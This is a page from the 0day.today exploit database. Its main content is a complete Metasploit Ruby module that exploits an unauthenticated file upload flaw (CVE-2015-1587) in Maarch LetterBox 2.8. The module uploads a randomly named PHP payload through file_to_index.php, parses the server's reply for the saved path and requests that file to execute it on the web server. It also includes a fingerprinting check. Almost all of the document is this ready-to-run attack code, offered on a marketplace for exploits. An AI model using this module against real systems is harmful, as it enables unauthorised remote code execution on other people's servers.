0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Maarch LetterBox 2.8 Unrestricted File Upload Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Maarch LetterBox 2.8 Unrestricted File Upload',
'Description' => %q{
This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of
session and file validation in the file_to_index.php script. It allows unauthenticated
users to upload files of any type and subsequently execute PHP scripts in the context of
the web server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Rob Carr <rob[at]rastating.com>'
],
'References' =>
[
['CVE', '2015-1587']
],
'DisclosureDate' => 'Feb 11 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Maarch LetterBox 2.8', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Maarch LetterBox', '/'])
], self.class)
end
def letterbox_login_url
normalize_uri(target_uri.path, 'login.php')
end
def letterbox_upload_url
normalize_uri(target_uri.path, 'file_to_index.php')
end
def check
res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url)
if res.nil? || res.code != 200
return Msf::Exploit::CheckCode::Unknown
elsif res.body.include?('alt="Maarch Maerys Archive v2.1 logo"')
return Msf::Exploit::CheckCode::Appears
end
Msf::Exploit::CheckCode::Safe
end
def generate_mime_message(payload, name)
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"")
data
end
def exploit
print_status("#{peer} - Preparing payload...")
payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
data = generate_mime_message(payload, payload_name)
print_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => letterbox_upload_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
print_status("#{peer} - Parsing server response...")
captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures
fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil?
payload_url = normalize_uri(target_uri.path, captures[0])
print_good("#{peer} - Response parsed successfully")
print_status("#{peer} - Executing the payload at #{payload_url}")
register_files_for_cleanup(File.basename(URI.parse(payload_url).path))
send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
end
end
# 0day.today [2024-07-05] #